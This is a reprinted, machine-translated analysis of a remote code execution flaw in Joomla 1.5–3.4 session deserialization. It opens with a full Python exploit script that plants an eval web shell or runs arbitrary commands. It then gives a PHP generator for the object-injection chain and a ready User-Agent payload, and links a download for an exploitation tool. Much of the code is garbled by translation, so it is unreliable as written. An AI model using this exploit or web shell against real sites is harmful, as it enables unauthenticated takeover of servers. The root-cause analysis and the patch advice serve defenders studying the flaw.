"Reprint" Joomla Remote Code execution Vulnerability Analysis

using scripts.
Exp:python jj.py http://123.123.123.123 Direct Getshell
Python jj.py http://123.123.123.123 "whoami"-execute command
#author:we8i&90secImporturllib2,urllib,base64ImportCOOKIELIB,SYS,RECJ=Cookielib. Cookiejar () opener=Urllib2.build_opener (urllib2. Httpcookieprocessor (CJ)) Urllib2.install_opener (opener) Urllib2.socket.setdefaulttimeout (10) ifLen (sys.argv) = = 2: Values= {'111': Base64.b64encode ('$myfile = fopen ($_server["Document_root"]. " /mail.php "," w+ ") or Die (" cctv321 "); Fwrite ($myfile," <?php @eval (\$_post[we8i]);? > "), Fclose ($myfile); echo" cctv123 " ;')}elifLen (sys.argv) = = 3: Values= {'111': Base64.b64encode ('echo "cctvcmd<sb>"; System ("'+sys.argv[2]+'" ); echo" </sb> ";')}ua='}__test| O:21: "Jdatabasedrivermysqli": 3:{s:2: "FC"; O:17: "Jsimplepiefactory": 0:{}s:21: "\x5c0\x5c0\x5c0disconnecthandlers" ; A:1:{i:0;a:2:{i:0;o:9: "Simplepie": 5:{s:8: "sanitize"; o:20: "Jdatabasedrivermysql": 0:{}s:8: "Feed_url"; s:60: "Eval (Base64_decode ($_post[111])); Jfactory::getconfig (); exit; "; s:19: "Cache_name_function"; s:6: "Assert"; S:5: "Cache"; B:1;s:11: "Cache_class"; o:20: "Jdatabasedrivermysql": 0:{}}i : 1;s:4: "Init";}} S:13: "\x5c0\x5c0\x5c0connection"; b:1;} \xf0\x9d\x8c\x86'req= Urllib2. Request (url=sys.argv[1],headers={'user-agent': UA}) Opener.open (req) Data=Urllib.urlencode (values) Req= Urllib2. Request (sys.argv[1],data) Comeback=Opener.open (req). Read ()if 'cctv123' inchComeback:Print "Shellurl:"+sys.argv[1]+"/mail.php"        Print "ps:if the shell url wrong try http://webUrlRoot/mail.php"elif 'cctv321' inchComeback:Print "The command can work,but the path maybe can not write!"elif 'Cctvcmd' inchComeback:cmd= Re.findall ("<sb> (. *) </sb>", Comeback,re. S) forXinchcmd:PrintX

And then we'll attach a. NET visualization. But not very stable, Getshell time to try a few more times.

Network address: Http://pan.baidu.com/s/1nu0tqHz

Vulnerability Analysis

Talk about the impact of this vulnerability and the trigger, the use of methods. This vulnerability affects the full version of Joomla 1.5 to 3.4, and the use of the vulnerability without logging in, only need to send two packets (the first time: the session into the database, the second time to send the same packet to remove the session, trigger the vulnerability, execute arbitrary code), The consequence is directly leading to arbitrary code execution.

0x00 vulnerability Point-deserialization session

This vulnerability exists in the process of deserializing the session.

The vulnerability exists in libraries/joomla/session/session.php, the _validate function, The UA and Xff call set methods are set to the session (Session.client.browser and session.client.forwarded)

protected function _validate ($restart =false) {        ...          Record Proxy Forwarded for inchThe sessioninchCase We need it laterif(Isset ($_server['http_x_forwarded_for']) {$this->set ('session.client.forwarded', $_server['http_x_forwarded_for']); }          ...        Check forClients Browserif(In_array ('Fix_browser', $this->_security) && isset ($_server['http_user_agent']) {$browser= $this->get ('Session.client.browser'); if($browser = = =null) {$this->set ('Session.client.browser', $_server['http_user_agent']); } elseif ($_server['http_user_agent'] !==$browser) {                @todo Remove Code: $this->_state ='Error'; @todo Remove Code:returnfalse; }

Eventually follow them both into the database, session table:

Under normal circumstances, there is no problem. Because we control just one string in the deserialized object, it does not trigger an inverse sequence-related vulnerability. However, because of a small posture, we can control the entire deserialization object later.

0X01 uses | character forgery to control the entire deserialization string

First of all, we need to see @ryat Teacher's pch-013:https://github.com/80vul/phpcodz/blob/master/research/pch-013.md first.

Similar to the situation in pch-013, Joomla does not use PHP's own session processing mechanism, but in a variety of ways (including database, memcache, etc.) to write their own storage session container (storage).

The storage format is "key name + vertical bar + value processed by serialize () function deserialization", where multiple vertical bars are not handled correctly.

Well, we can get here by injecting a "|" Symbol, the previous part of it is all considered name, and after | I can insert any serialize string to construct a deserialization vulnerability.

But there is another problem, after we have constructed the deserialized string, and its original content, must be truncated. This is not like SQL injection, and there are annotations available. I do not know if you remember the same time WordPress out of an XSS, that is, when inserting the database using the "%f0%9d%8c%86" character to the MySQL utf-8 field truncated.

Here we use the same method to truncate the back of the session as it enters the database to avoid any impact on our deserialization process.

0x02 constructs a pop execution chain and executes arbitrary code

After we can control the deserialization object, we only need to construct a chain of execution that can be called in step, so we can do some dangerous operations. Exp constructs the execution chain, using the following classes, respectively:

1. Jdatabasedrivermysqli

2. Simplepie

We can find a sensitive operation in the destructor of the Jdatabasedrivermysqli class:

__destruct () {    $this-Disconnect ();} ... public function disconnect    () {//Close the connection.     if (Connection, $this)    {        foreach ($this-disconnecthandlers as $h)        {            &$this));        }          Mysqli_close ($this-connection);    }      $this->connection = null;}

When the Exp object is deserialized, it becomes a Jdatabasedrivermysqli class object, regardless of how the middle executes, and the final call to __destruct,__destruct will call disconnect, There is a sensitive function in disconnect: Call_user_func_array.

But obviously, the second parameter of the Call_user_func_array here is beyond our control. Therefore, it is not possible to construct assert+eval directly to execute arbitrary code.
Here again an object is called: The Simplepie Class object, and its Init method form a callback function [new Simplepie (), ' init '], passed in the Call_user_func_array. Follow the Init method:

function init () {//Check Absolute bare minimum requirements. if((Function_exists ('Version_compare') && Version_compare (Php_version,'4.3.0','<')) || !extension_loaded ('XML') || !extension_loaded ('Pcre'))        {            returnfalse; }        ...        if($this->feed_url!== null | | $this->raw_data!==null) {$this->data =Array (); $this->multifeed_objects =Array (); $cache=false; if($this->feed_url!==null) {$parsed _feed_url= Simplepie_misc::p arse_url ($thisFeed_url); //Decide whether to enable cachingif($this->cache && $parsed _feed_url['Scheme'] !=="') {$cache= Call_user_func (Array ($this->cache_class,'Create'), $this->cache_location, Call_user_func ($this->cache_name_function, $this->feed_url),'SPC'); }

Obviously, these two call_user_func will be the culprit for triggering code execution. So, I cache_name_function the first parameter of the second Call_user_func, the assignment to assert, the second parameter to the code I need to execute, and a "callback backdoor" is constructed.

So, how is exp generated? Give me the generated code I wrote:

<? PHPHeader"Content-type:text/plain");classjsimplepiefactory {}classJdatabasedrivermysql {}classSimplepie {var $sanitize;    var $cache;    var $cache _name_function;    var $javascript;    var $feed _url; function__construct() {$this->feed_url ="phpinfo (); Jfactory::getconfig (); exit;"; $this->javascript = 9999; $this->cache_name_function ="assert"; $this->sanitize =new Jdatabasedrivermysql (); $this->cache =true; }}  classjdatabasedrivermysqli {protected $a;    protected $disconnectHandlers;    protected $connection; function__construct() {$this->a =new Jsimplepiefactory (); $x=new Simplepie (); $this->connection = 1; $this->disconnecthandlers =[[$x,"Init"],        ]; }} $a=new Jdatabasedrivermysqli (); Echo serialize ($a);

The exp generated by this code is injected "|" as mentioned earlier. In the user-agent mentioned above, triggering code execution. Where we need to replace char (0) *char (0) with \0\0\0, because at the time of serialization, the protected type variable is converted to the \0*\0name style, and this substitution is also visible in the source code:

1	$result= str_replace(‘\0\0\0‘, chr(0) . ‘*‘. chr(0), $result);

The construction of a little trouble, that is, by default simplepie is not defined, which is why I called Simplepie before the first new jsimplepiefactory reason, Because the Jsimplepiefactory object calls the Import function at load time to import Simplepie into the current working environment:

And Jsimplepiefactory has autoload, so no other include is needed to load it. Give me the final constructed POC (both the POC generated by the appeal PHP code):

1

User-Agent: 123}__test|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:37:"ρhιτhσπpinfo();JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}ð???

A POC that was successfully executed for a piece of code:

0x03 Impact version & Repair Solution

1.5 to 3.4 full version

Updated to 3.4.6 version

Reprinted from 360 security broadcasts, exp and articles collected by Blck.

"Reprint" Joomla Remote Code execution Vulnerability Analysis